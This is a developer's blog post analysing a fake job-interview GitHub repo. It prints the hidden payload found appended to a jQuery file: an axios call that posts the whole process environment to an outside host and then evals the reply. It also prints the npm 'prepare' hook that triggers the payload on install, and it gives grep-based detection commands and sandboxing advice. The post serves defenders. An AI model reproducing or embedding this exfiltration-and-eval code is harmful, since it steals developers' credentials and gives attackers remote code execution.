They Sent Me a Malicious GitHub Repo Disguised as a Job Interview
How targeted developer attacks hide in plain sight.
I almost missed it.
The repo looked fine. Node/Express backend, React frontend, some Solidity contracts, Moralis integration. A Web3 presale platform -- exactly the kind of take-home project a crypto startup might send you. Clean README, reasonable architecture, sensible dependencies. I audited it file by file: server.js, auth.js, router.js, db.js, all the route handlers. Standard stuff. A few code quality issues but nothing alarming.
Then I hit config/utils/libs/search.min.js.
The file is 10,000 lines long. The first 9,980 are the complete, unmodified source of jQuery 3.7.1 -- a real, legitimate library. At the very end, appended after all of it:
const axios = require('axios');
const host = "locate-my-ip.vercel.app";
const apikey = "3aeb34a31";
axios.post(`https://${host}/api/ip-check-encrypted/${apikey}`, {
...process.env
}).then((response) => { eval(response.data); });
Two attacks. Your entire environment exfiltrated to an attacker-controlled server. Then eval(response.data) -- whatever JavaScript the server sends back gets executed immediately. Every secret in your shell. Every API key. Every credential that was set in your environment when you typed npm install. Gone. And a persistent backdoor for them to push arbitrary code to your machine whenever they want.
This is what targeted developer attacks actually look like. Not some sketchy ZIP file with an obvious payload. A complete, functional-looking application with the malicious code buried in a file designed to never be read.
The Threat Is Real and Growing
This isn't hypothetical. Campaigns targeting developers through fake job interviews and take-home projects have been documented extensively since at least 2022, accelerating into 2024 and 2025. The Lazarus Group -- a North Korean state-sponsored threat actor -- has been attributed to multiple campaigns specifically targeting crypto developers and Web3 engineers. Operation Dream Job. TraderTraitor. DeathNote. Different names, same playbook: get a developer to clone and run a repo by making it look like legitimate interview work.
The targeting is precise. Developers are valuable because they have access to production systems, private keys, internal credentials, and deployment pipelines. One compromised developer laptop can be a direct path to an eight-figure crypto theft. This isn't opportunistic malware spray -- it's a deliberate, patient attack on a specific class of target.
And unlike most malware campaigns, this one abuses something developers are trained to trust: GitHub repos with readable source code. The implicit assumption is that if you can read the code, you can evaluate it. That assumption is the attack surface.
How This Attack Works
The Camouflage Strategy
The repo I audited had seven clean files for every suspicious one. server.js was 30 lines of boilerplate Express. auth.js was textbook JWT middleware. db.js had the MongoDB connection commented out entirely. The route handlers were standard CRUD. Someone put real work into making the surrounding code look like a legitimate, if unfinished, project.
The malicious file was placed in config/utils/libs/ -- a path that reads as an internal utility directory. The .min suffix signals "this is a build artifact, don't read it." Naming it search.min.js and wrapping the payload in jQuery source is clever: if you do open the file, you'll see a massive wall of legitimate minified code and close it. Most people would stop there.
The file is required in presale.js:
const search = require('../../../config/utils/libs/search.min')
That require() call executes the module-level code immediately when the server loads -- not when the search function is called. You don't have to hit the /search endpoint. The exfiltration happens the moment node server.js runs.
The prepare Hook Problem
There's a second layer to this specific attack that I noticed before finding the payload. The package.json contains:
"prepare": "npm run server | react-scripts start"
The prepare lifecycle hook fires automatically during npm install. This means running npm install -- the first thing any developer does with a new repo, before reading a single line of code -- starts the Express server, which loads search.min.js, which fires the exfiltration request.
You don't even have to consciously run the app. npm install is the attack.
The Exfiltration Payload
...process.env is the most dangerous two tokens in JavaScript for this threat model. It spreads your entire environment as the POST body. What's in your environment when you're doing interview prep at your desk?
Your shell environment inherits everything: AWS keys if you've configured the CLI, SSH agent credentials, GitHub tokens if you use the CLI, any secrets from your dotfiles, .env files sourced into your shell, your actual MongoDB URI if you have projects running locally. Developers tend to have powerful credentials in their environment because they work with infrastructure. That's precisely why developers are the target.
The request goes to locate-my-ip.vercel.app -- a Vercel-hosted endpoint. Vercel gives attackers legitimate HTTPS and a CDN-backed domain that won't trip basic network filters. The /api/ip-check-encrypted/ path and API key structure makes it look like a third-party service integration if someone glances at the code.
The RCE Backdoor
The eval(response.data) half of this is arguably more dangerous than the initial exfiltration. It's a remote code execution channel that the attacker controls entirely. They can:
- Push a reverse shell after you've started the app
- Scan your filesystem for private keys,
.envfiles,~/.ssh,~/.aws/credentials - Install persistence mechanisms
- Pivot to your local network
- Wait. Run nothing for days. Execute when you're connected to a VPN or have accessed sensitive systems
The malicious code runs every time the server starts, not just once. Close the app, reopen it two weeks later, the backdoor phones home again and gets whatever payload the attacker decides to push that day.
What to Look For
The Minified File in Source Code
Minified files have no business being committed to a source repository. Build artifacts belong in dist/, build/, or generated at CI time. A .min.js file committed to src/, config/, lib/, or utils/ is a red flag. Always read them. A legitimate minified library can be verified against its published checksum. An unexpected one warrants full inspection regardless of how long it is.
The Deep Path Trick
config/utils/libs/search.min is three directories deep from the root. Attackers nest malicious files because humans audit top-level files more carefully than deeply nested ones. Grep the entire repo for require() calls before you run anything:
grep -r "require(" . --include="*.js" | grep -v node_modules
Check every path. If a require() points to a file you haven't read, read it.
Lifecycle Hooks
npm install is not a passive operation. The following package.json scripts execute automatically without any action beyond npm install or npm publish:
preparepreinstallpostinstallprepackpostpack
Read all of them before running anything. postinstall is the most common vector -- it's designed for legitimate post-install setup like compiling native modules, but it's also the first place malicious repos hide execution. If a hook runs node, python, bash, or sh with anything other than a completely transparent build step, stop.
Use npm install --ignore-scripts to install dependencies without executing any lifecycle hooks. This lets you read the code before it can run.
Spreaded Environment Variables
Search for process.env in any repo you're auditing:
grep -r "process\.env" . --include="*.js" | grep -v node_modules
A legitimate app reads specific keys: process.env.DATABASE_URL, process.env.PORT. When you see ...process.env -- the spread operator applied to the entire environment object -- that's exfiltration. There is no legitimate reason for application code to spread your full environment into a function argument.
Outbound HTTP in Unexpected Places
Network calls should live in well-defined service layers. A utility file in config/utils/ that makes an axios.post() is wrong. Search for all outbound HTTP calls:
grep -rn "axios\|fetch\|http\.request\|https\.request\|got\|needle\|request(" . --include="*.js" | grep -v node_modules
Verify every one. Check the domain against what the app is supposed to do. A presale frontend has no reason to POST to locate-my-ip.vercel.app.
eval() and Dynamic Execution
grep -rn "eval\|new Function\|require(variable" . --include="*.js" | grep -v node_modules
eval(response.data) is about as explicit as a red flag gets, but attackers can obfuscate it. new Function(string)() is functionally equivalent. Dynamic require() calls with variables rather than string literals deserve close scrutiny. Any code that takes a string from the network and executes it is a backdoor by definition.
Unicode Steganography
This deserves its own callout because it's genuinely invisible to code review. Researchers recently documented a campaign called Glassworm that hides malicious payloads in Unicode Private Use Area characters -- zero-width whitespace characters that render as nothing in every code editor and diff tool. The payload is invisible in GitHub's UI, invisible in your terminal, invisible in VS Code. A small decoder extracts and evals the hidden bytes.
Visual code review cannot protect you against this. You need tooling that scans for non-standard Unicode ranges. Run this on any untrusted repo:
grep -rPn "[\x{E0100}-\x{E01EF}\x{FE00}-\x{FE0F}]" . --include="*.js"
Or use a dedicated tool -- Aikido's scanner specifically targets this pattern.
The Defense Stack
Before touching the code at all: Read package.json scripts. Every single one. Check every direct dependency against the npm registry -- verify the name is spelled correctly (typosquatting is common), check when it was published, look at the weekly downloads. A package with 12 downloads published two weeks ago that happens to share a name with a popular library is a dependency confusion attack.
Before running npm install: Use npm install --ignore-scripts. Then read the codebase. grep -r "require(" and trace every import path. Look for minified files in non-build directories. Search for process.env, eval, and outbound HTTP.
When you do run it: Run it in a VM with no shared folders, no clipboard integration, and no network access to your LAN. Snapshot before running. Use a host-only or completely isolated network adapter. The VM should have nothing valuable in its environment -- empty credential files, no SSH keys loaded, no cloud CLI configured. The blast radius of a compromised VM with an isolated network is essentially zero.
If you need network access for the build: Allow it during dependency installation. Cut it before execution. Many of these payloads phone home on server start, so denying egress at runtime kills the exfiltration even if you missed the code.
Why This Keeps Working
Developers are trained to trust code review. The entire open source security model is built on the premise that readable source is reviewable source. These attacks subvert that assumption in a few specific ways: cognitive fatigue from large codebases, the convention that minified files are build artifacts, the assumption that the interesting code is in the application layer rather than in utility libraries.
There's also a social layer. You're reviewing this code because someone sent it to you as part of a job process. You want the job. You're under time pressure. The code looks legitimate because most of it is. The human tendency to pattern-match to "this looks like a normal project" is being exploited deliberately.
The repo I audited had 448 commits. A history. Contributors. A README with a features table and a deployment section. Someone spent time on this.
The correct mental model is: any repo you didn't write is untrusted code. The appropriate execution environment for untrusted code is the same whether it came from a stranger on the internet or a recruiter at a company you'd like to work for. Disposable VM, isolated network, nothing valuable in the environment.
npm install can be an attack. search.min.js can be a backdoor. A 10,000-line file is still worth reading if the last 20 lines are the ones that matter.
Found a malicious repo in the wild? The Aikido Security team and the OpenSSF malicious-packages project both accept reports. GitHub's security team at security@github.com takes these seriously. Report it -- the next person it gets sent to might not audit carefully enough.